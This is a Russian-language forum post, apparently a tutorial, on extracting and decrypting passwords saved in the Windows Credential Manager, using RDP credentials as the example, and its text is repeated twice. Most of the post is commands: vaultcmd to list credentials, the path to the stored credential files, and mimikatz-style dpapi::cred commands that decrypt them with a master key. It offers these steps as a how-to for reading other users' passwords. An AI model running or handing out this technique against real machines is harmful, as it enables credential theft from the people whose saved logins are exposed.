- Автор темы
- #1
Рассмотрим работу с диспетчером учетных данных на примере RDP.
Тёмная
Найти те же данные с помощью командной строки можно следующим образом (для английской локалки следует использовать строку /listcreds:»Windows Credentials».):
1
> vaultcmd /listcreds:"Учетные данные Windows" /all
Эти учетные данные хранятся в каталоге пользователя:
1
C:\Users\<USER>\AppData\Local\Microsoft\Credentials\
Посмотрим на эти данные.
1
dpapi::cred /in:C:\Users\<USER>\AppData\Local\Microsoft\Credentials\[хранилище]
Самое интересное здесь — это pbData (данные, которые нужно расшифровать) и guidMasterKey. Как получить мастер-ключ, мы рассмотрели раньше (эту стадию мы пропустим). Давайте расшифруем учетные данные.
1
dpapi::cred /in:C:\Users\<USER>\AppData\Local\Microsoft\Credentials\[хранилище] /masterkeys:[мастер-ключ]
Подобным образом можно извлечь любые данные, сохраненные в WCM.
На этом все. Теперь вы знаете, как расшифровать и просмотреть пароль в диспетчере учетных данных Windows.

Тёмная
Найти те же данные с помощью командной строки можно следующим образом (для английской локалки следует использовать строку /listcreds:»Windows Credentials».):
1
> vaultcmd /listcreds:"Учетные данные Windows" /all

Эти учетные данные хранятся в каталоге пользователя:
1
C:\Users\<USER>\AppData\Local\Microsoft\Credentials\

Посмотрим на эти данные.
1
dpapi::cred /in:C:\Users\<USER>\AppData\Local\Microsoft\Credentials\[хранилище]

Самое интересное здесь — это pbData (данные, которые нужно расшифровать) и guidMasterKey. Как получить мастер-ключ, мы рассмотрели раньше (эту стадию мы пропустим). Давайте расшифруем учетные данные.
1
dpapi::cred /in:C:\Users\<USER>\AppData\Local\Microsoft\Credentials\[хранилище] /masterkeys:[мастер-ключ]

Подобным образом можно извлечь любые данные, сохраненные в WCM.
На этом все. Теперь вы знаете, как расшифровать и просмотреть пароль в диспетчере учетных данных Windows.